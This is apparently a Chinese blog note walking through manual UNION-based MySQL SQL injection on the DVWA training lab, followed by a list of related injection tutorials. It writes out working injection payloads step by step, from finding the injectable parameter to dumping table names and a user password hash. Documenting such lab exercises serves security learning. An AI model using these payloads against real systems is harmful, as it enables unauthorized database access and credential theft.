2. 程式人生 > 實用技巧 >mysql 簡單手工注入

mysql 簡單手工注入

阿新 發佈:2020-12-03

來源 dvwa 平臺 級別為Low 中的SQL Injection 試題

1. 判斷注入點

# 網址?id=1
id=1\
id=1'			# 頁面如果報錯多了一個單引號,那麼說明可能存在注入點
‘id=1 and 1=1’頁面正常,‘id=1 and 1=2’時頁面不正常,則這個頁面邊可能存在注入
id=1' #   # '#' 號註釋,註釋閉合的單引號,可以試試

當前題目使用 id=1' # # 後面註釋,截斷

2.判斷列的個數 order by

id=1' oreder by 2 #
id=1' oreder by 3 #

# 測試 判斷列數3 報錯,有2列

3.判斷回顯位 union

# 輸入一個不存在的id
?id=-1'  union select 100,200 #
# select 後面 個數和列數對應,看網頁中顯示位置上的數,表示那個位置為回顯位

# 回顯位為 ----> 200 位置

4. 替換回顯位,注入

使用內部變數,或者語句

# database() 資料庫名 
# -1' union select 100,database() #

# 庫名為 ----->dvwa

庫名,版本等資訊

version()、@@datadir、@@basedir

5.根據information_schema 庫

information_schema

資料庫中記錄所有資訊

information_schema.tables 表中記錄所有資料庫名 table_schema,table_name 重要欄位

information_schema.columns 表中記錄所有列名 table_schema,table_name,column_name 重要欄位

group_concat(欄位名) 函式,可以讓欄位顯示在同一行

注入出表名

information_schema.tables 根據這個表

# -1' union select 100,group_concat(table_name) from information_schema.tables where table_schema=database()  #

或者 後面的 database() 直接換成上一步注入出來的庫名
-1' union select 100,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

# 注入出兩個表--->guestbook,users
注入出列名

information_schema.columns 根據這個表

# -1' union select 100,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

# 表中所有列 user_id,first_name,last_name,user,password,avatar,last_login,failed_login

6.注入出user表資料

-1' union select 100, group_concat(user_id , user , password,) from dvwa.users #
# 查詢所有
-1' union select 100, user  from dvwa.users limit 0,1 #
# 查詢users表中的user 欄位第一個------》 admin
-1' union select 100, password  from dvwa.users limit 0,1 #
# 查詢密碼第一個 -----》 5f4dcc3b5aa765d61d8327deb882cf99

大概過程,自己記錄一下。

相關推薦

mysql 簡單手工注入

來源 dvwa 平臺級別為Low 中的SQL Injection 試題 1. 判斷注入點 # 網址?id=1 id=1\\ id=1\'# 頁面如果報錯多了一個單引號,那麼說明可能存在注入

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

新手科普 | MySQL手工注入之基本注入流程

MySQL手工注入的基本步驟以及一些技巧的記錄,當出現學習手工注入的時候,網上的文章參差不齊,導致很長一段時間對手工注入的理解一直處於一知半解的狀態,特此記錄本文,讓小白們少走些彎路。本文只針對手工注入小白

MySQL簡單瞭解“order by”是怎麼工作的

針對排序來說,order by 是我們使用非常頻繁的關鍵字。結合之前我們對索引的瞭解再來看這篇文章會讓我們深刻理解在排序的時候,是如何利用索引來達到少掃描表或者使用外部排序的。

mssql 手工注入流程小結

對於MSSQL的注入點,無外乎這三種許可權:SA,DB_OENER,PUBLIC。SA(System Admin)許可權我們可以直接執行命令,DB_OENER許可權的話,我們可以找到WEB的路徑,然後用備份的方式得到webshell,有時也可以對登入檔進行

Windows 10 搭鍵開源IDS-Snort,簡單過濾注入

關於Snort snort有三種工作模式:嗅探器、資料包記錄器、網路入侵檢測系統。嗅探器模式僅僅是從網路上讀取資料包並作為連續不斷的流顯示在終端上。資料包記錄器模式把資料包記錄到硬碟上。網路入侵檢測模式是最複雜的

php設計模式-簡單依賴注入容器+自動繫結特性

class C { public function sayHello() { echo \'I am C\'; } } class B { private $_c; public function __construct(C $c)

基於PHP+Mysql簡單實現了圖書購物車系統的例項詳解

PHP+Mysql簡單實現了圖書購物車 本文主要講述如何通過PHP+HTML簡單實現圖書購物車的功能,這是提取我們php專案的部分內容。主要內容包括:

mysql - 簡單查詢

-- distinct select distinct user_email from `user`; -- order by 欄位1 desc/asc[, 欄位2 desc/asc] -- 預設是asc

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

MySQL簡單查詢詳解-單表查詢

一.查詢的執行路徑   一條SQL查詢語句的執行過程大致如下圖所示:   1>.客戶端和服務端通過mysql協議進行通訊,mysql伺服器通過某種客戶端傳送來的查詢語句的時候,首先會去本地檢驗快取是否命中,如果請求的

MYSQL顯錯注入演示

靶場題目:注意閉合 用”)進行閉合 進行閉合後就不再是字串,輸入的資料可以被當成程式碼執行 id=() 閉合了前括號, 還有註釋掉後面的後括號,用-- qwe 主要是為了保留橫橫後面的空格,因為可以自動去除空

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

SQL手工注入方法

 SQL手工注入漏洞測試(MySQL資料庫) 的靶場練習   流程與方法 注意:加粗部分給重點

jdbc連線mysql簡單例項,在java專案中新增資料庫驅動包

傻瓜式教學從建立專案,到資料庫建立,訪問一步到位 開啟eclipse,new java Project建立一個普通的java專案

MySQL學習-SQL語句的分類與MySQL簡單查詢

技術標籤:資料庫MySQL 1.SQL語句的分類 學習MySQL主要還是學習通用的SQL語句,那麼SQL語句包括增刪改查,SQL語句怎麼分類呢?   DQL(資料查詢語言): 查詢語句,凡是select語句都是DQL。   DML(資料操作語

12-mysql簡單優化

1、執行情況檢視 根據情況選擇合適的儲存引擎 # 檢視所有執行情況,加global為執行至今

Mysql 的sql注入是什麼?怎麼解決?

技術標籤:mysqlmysql sql注入的原因 語句和使用者輸入的內容進行拼接,傳送給資料庫編譯的時候,資料庫將使用者輸入的內容當成sql語句編譯了。從而從根本上改變了我們開發者所期望sql語句原有的含義。導致程式受

16-MySQL-JDBC-SQL注入問題及PreparedStatement物件

技術標籤:MySQLjavajdbcmysql MySQL -> JDBC -> SQL注入問題、PreparedStatement物件 1. SQL注入問題

mysql簡單資料庫定期備份

技術標籤:資料庫mysql資料庫linux 需要對單節點mysql主機中的資料庫定期進行備份,備份需求是每天全量備份一次,保留七天資料,方法如下:需要備份的資料庫: infor yy書寫的指令碼為: